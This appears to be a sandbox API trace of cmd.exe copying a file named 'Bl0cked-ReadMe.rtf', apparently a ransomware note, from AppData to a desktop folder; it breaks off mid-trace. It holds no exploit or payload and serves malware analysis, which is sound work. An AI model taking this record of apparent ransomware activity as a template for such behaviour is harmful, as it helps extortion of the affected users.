0x49e00000 [0225.535] __set_app_type (_Type=0x1) [0225.535] __p__fmode () returned 0x76b331f4 [0225.535] __p__commode () returned 0x76b331fc [0225.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.535] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.536] GetCurrentThreadId () returned 0x12c [0225.536] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12c) returned 0x38 [0225.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.536] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.536] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.536] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef7d4 | out: phkResult=0x2ef7d4*=0x0) returned 0x2 [0225.536] VirtualQuery (in: lpAddress=0x2ef80b, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: 
lpBuffer=0x2ef7a4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.536] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef7a4, dwLength=0x1c | out: lpBuffer=0x2ef7a4*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0225.536] GetConsoleOutputCP () returned 0x1b5 [0225.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.537] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.537] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.537] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.537] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.538] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.538] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.538] GetEnvironmentStringsW () returned 0x3e0178* [0225.538] FreeEnvironmentStringsW (penv=0x3e0178) returned 1 [0225.538] GetEnvironmentStringsW () returned 0x3e0178* [0225.538] FreeEnvironmentStringsW (penv=0x3e0178) returned 1 [0225.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee744 | out: phkResult=0x2ee744*=0x40) returned 0x0 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0xa0, 
lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x0, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegCloseKey (hKey=0x40) returned 0x0 [0225.539] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee744 | out: phkResult=0x2ee744*=0x40) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x0, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x9, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x9, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x9, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegCloseKey (hKey=0x40) returned 0x0 [0225.539] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.539] srand (_Seed=0x5b8863b9) [0225.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0225.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0225.540] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.540] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.540] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.540] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.540] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.540] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.540] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.540] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.540] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.540] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.540] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.540] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.540] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.540] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.541] GetEnvironmentStringsW () returned 0x3e22c8* [0225.541] FreeEnvironmentStringsW (penv=0x3e22c8) returned 1 [0225.541] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.541] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.541] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.541] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0225.541] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.541] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.541] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.541] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.541] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.541] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.541] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef510, lpFilePart=0x2ef50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef50c*="Desktop") returned 0x18 [0225.541] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.541] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef28c | out: lpFindFileData=0x2ef28c) returned 0x3e0008 [0225.542] FindClose (in: hFindFile=0x3e0008 | out: hFindFile=0x3e0008) returned 1 [0225.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef28c | out: lpFindFileData=0x2ef28c) returned 0x3e0008 [0225.542] FindClose (in: hFindFile=0x3e0008 | out: hFindFile=0x3e0008) returned 1 [0225.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef28c | out: lpFindFileData=0x2ef28c) returned 0x3e0008 [0225.542] FindClose (in: hFindFile=0x3e0008 | out: hFindFile=0x3e0008) returned 1 [0225.542] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.542] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.542] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.542] 
GetEnvironmentStringsW () returned 0x3e2ae8* [0225.543] FreeEnvironmentStringsW (penv=0x3e2ae8) returned 1 [0225.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.543] GetConsoleOutputCP () returned 0x1b5 [0225.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.647] GetUserDefaultLCID () returned 0x409 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef650, cchData=128 | out: lpLCData="0") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef650, cchData=128 | out: lpLCData="0") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef650, cchData=128 | out: lpLCData="1") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, 
cchData=8 | out: lpLCData=".") returned 2 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.648] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.649] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.649] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.649] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.649] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.649] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.650] _wcsicmp (_String1="type", _String2=")") returned 75 [0225.650] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0225.650] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0225.650] _wcsicmp (_String1="IF", _String2="type") returned -11 [0225.650] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0225.650] _wcsicmp (_String1="REM", _String2="type") returned -2 [0225.650] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0225.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.655] GetFileType (hFile=0x7) returned 0x2 [0225.655] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef548 | out: lpMode=0x2ef548) returned 1 [0225.655] _dup (_FileHandle=1) returned 3 [0225.655] _close (_FileHandle=1) returned 0 [0225.656] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0225.656] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef518, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0225.657] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0225.657] GetConsoleTitleW (in: lpConsoleTitle=0x2ef348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.657] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0225.657] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0225.657] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0225.657] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0225.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.658] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2eeeac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeeac) returned 0x3d0e60 [0225.659] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0225.659] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0225.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0225.659] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eddb8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0225.659] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] GetFileType (hFile=0x54) returned 0x1 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ede10 | out: 
lpFileSizeHigh=0x2ede10*=0x0) returned 0x1632 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.659] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.659] GetFileType (hFile=0x4c) returned 0x1 [0225.659] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.659] GetFileType (hFile=0x4c) returned 0x1 [0225.660] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.660] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile 
(in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.662] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.662] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 
0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.663] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.663] 